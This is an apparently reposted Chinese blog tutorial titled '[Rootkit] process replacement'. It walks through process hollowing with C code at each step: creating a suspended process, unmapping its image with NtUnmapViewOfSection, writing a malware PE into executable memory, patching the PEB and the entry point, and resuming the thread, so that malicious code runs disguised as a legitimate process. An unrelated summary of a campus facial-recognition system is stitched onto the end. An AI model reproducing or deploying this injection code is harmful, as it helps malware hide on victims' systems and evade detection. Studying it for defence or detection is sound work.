[Rootkit] 进程替换

本文的进程替换是指将正在运行的程序的内存空间用恶意代码替换掉. 如果被替换的进程是合法的进程, 那么恶意代码可以披着合法的外衣干坏事了. 当然坏事干多了还是会被发现的.

替换的过程如下:

  1. 创建一个挂起状态(SUSPEND)的进程, 此时进程的主线程还未开始运行.
  2. 读取主线程的上下文(CONTEXT), 并读取新创建进程的基址.
  3. 使用NtUnmapViewOfSection将新创建的进程的内存空间释放掉, 随后可以开始填充恶意代码.
  4. 设置主线程的上下文, 启动主线程.

一. 我将恶意代码当成资源文件, 所以先将资源文件加载到内存中.

LPVOID ExtractRes(HMODULE hModule)
  {
    HRSRC hResInfo;
    HGLOBAL hResData;
    LPVOID lpResLock;
    DWORD dwSize;
    LPVOID lpAddr;
 
    hResInfo = FindResource(hModule, MAKEINTRESOURCE(101), _T("MALWARE"));
    hResData = LoadResource(hModule, hResInfo);
    lpResLock = LockResource(hResData);
    dwSize = SizeofResource(hModule, hResInfo);
    lpAddr = VirtualAlloc(0, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    memcpy(lpAddr, lpResLock, dwSize);
 
    return lpAddr;
  }

二. 此时lpAddr指向恶意代码的基址, 大小是dwSize. 创建一个挂起状态的进程, 用CREATE_SUSPENDED指定.

STARTUPINFO si;
  PROCESS_INFORMATION pi;
 
  ZeroMemory(&si, sizeof(si));
  si.cb = sizeof(si);
  ZeroMemory(&pi, sizeof(pi));
  if (CreateProcess(cAppName, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED,  NULL, NULL,  &si, &pi) == 0)
  {
    return -1;
  }

三. 读取主线程的上下文, 用于恢复线程启动时使用. 此时需要读取新创建进程的基址, 用于NtUnmapViewOfSection函数.
读取基址的方法: 此时context中的EBX是指向PEB的指针, 而在PEB偏移是8的位置存放了基址. 由于PEB在新创建的进程的内存空间需要使用ReadProcessMemory来读取.

 CONTEXT context;
  context.ContextFlags = CONTEXT_FULL;
  if (GetThreadContext(pi.hThread, &context) == 0)
  {
    return -1;
  }
 
  // EBX points to PEB, offset 8 is the pointer to the base address
  if (ReadProcessMemory(pi.hProcess, (LPCVOID)(context.Ebx + 8), &dwVictimBaseAddr, sizeof(PVOID), NULL) == 0)
  {
    return -1;
  }

四. 使用NtUnmapViewOfSection函数释放内存空间, 然后在该空间申请一块空间用于存放恶意代码.
基址是pNtHeaders->OptionalHeader.ImageBase, 大小是pNtHeaders->OptionalHeader.SizeOfImage.

 typedef ULONG (WINAPI *PFNNtUnmapViewOfSection) (HANDLE ProcessHandle, PVOID BaseAddress);
  HMODULE hNtModule = GetModuleHandle(_T("ntdll.dll"));
  if (hNtModule == NULL)
  {
    hNtModule = LoadLibrary(_T("ntdll.dll"));
    if (hNtModule == NULL)
    {
      return -1;
    }
  }
 
  PFNNtUnmapViewOfSection pfnNtUnmapViewOfSection = (PFNNtUnmapViewOfSection)GetProcAddress(hNtModule, "NtUnmapViewOfSection");
  if (pfnNtUnmapViewOfSection == NULL)
  {
    return -1;
  }
 
  pfnNtUnmapViewOfSection(pi.hProcess, (PVOID)dwVictimBaseAddr);
   
  lpNewVictimBaseAddr = VirtualAllocEx(pi.hProcess,
            (LPVOID)pNtHeaders->OptionalHeader.ImageBase,
            pNtHeaders->OptionalHeader.SizeOfImage,
            MEM_COMMIT | MEM_RESERVE,
            PAGE_EXECUTE_READWRITE);

五. 向新申请的空间写入恶意代码.

// Replace headers
  WriteProcessMemory(pi.hProcess, lpNewVictimBaseAddr, lpMalwareBaseAddr, pNtHeaders->OptionalHeader.SizeOfHeaders, NULL);
 
  // Replace each sections
  LPVOID lpSectionBaseAddr = (LPVOID)((DWORD)lpMalwareBaseAddr + pDosHeader->e_lfanew + sizeof(IMAGE_NT_HEADERS));
  PIMAGE_SECTION_HEADER pSectionHeader;
  for (idx = 0; idx < pNtHeaders->FileHeader.NumberOfSections; ++idx)
  {
    pSectionHeader = (PIMAGE_SECTION_HEADER)lpSectionBaseAddr;
    WriteProcessMemory(pi.hProcess,
      (LPVOID)((DWORD)lpNewVictimBaseAddr + pSectionHeader->VirtualAddress),
      (LPCVOID)((DWORD)lpMalwareBaseAddr + pSectionHeader->PointerToRawData),
      pSectionHeader->SizeOfRawData,
      NULL);
    lpSectionBaseAddr = (LPVOID)((DWORD)lpSectionBaseAddr + sizeof(IMAGE_SECTION_HEADER));
  }
 
  // Replace the base address in the PEB
  DWORD dwImageBase = pNtHeaders->OptionalHeader.ImageBase;
  WriteProcessMemory(pi.hProcess, (LPVOID)(context.Ebx + 8), (LPCVOID)&dwImageBase, sizeof(PVOID), NULL);

六. 设置上下文, 并启动主线程. 需要注意的是, 程序的入口点是放在EAX寄存器中的.

// Replace Entry Point Address
  context.Eax = dwImageBase + pNtHeaders->OptionalHeader.AddressOfEntryPoint;
  SetThreadContext(pi.hThread, &context);
  ResumeThread(pi.hThread);

转自:https://bbs.pediy.com/thread-153508.htm

# 高校智慧校园解决方案摘要 智慧校园解决方案是针对高校信息化建设的核心工程,旨在通过物联网技术实现数字化校园的智能化升级。该方案通过融合计算机技术、网络通信技术、数据库技术和IC卡识别技术,初步实现了校园一卡通系统,进而通过人脸识别技术实现了更精准的校园安全管理、生活管理、教务管理和资源管理。 方案包括多个管理系统:智慧校园管理平台、一卡通卡务管理系统、一卡通人脸库管理平台、智能人脸识别消费管理系统、疫情防控管理系统、人脸识别无感识别管理系统、会议签到管理系统、人脸识别通道管理系统和图书馆对接管理系统。这些系统共同构成了智慧校园的信息化基础,通过统一数据库和操作平台,实现了数据共享和信息一致性。 智能人脸识别消费管理系统通过人脸识别终端,在无需接触的情况下快速完成消费支付过程,提升了校园服务效率。疫情防控管理系统利用热成像测温技术、视频智能分析等手段,实现了对校园人员体温监测和疫情信息实时上报,提高了校园公共卫生事件的预防和控制能力。 会议签到管理系统和人脸识别通道管理系统均基于人脸识别技术,实现了会议的快速签到和图书馆等场所的高效通行管理。与图书馆对接管理系统实现了一卡通系统与图书馆管理系统的无缝集成,提升了图书借阅的便捷性。 总体而言,该智慧校园解决方案通过集成的信息化管理系统,提升了校园管理的智能化水平,优化了校园生活体验,增强了校园安全,并提高了教学和科研的效率。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值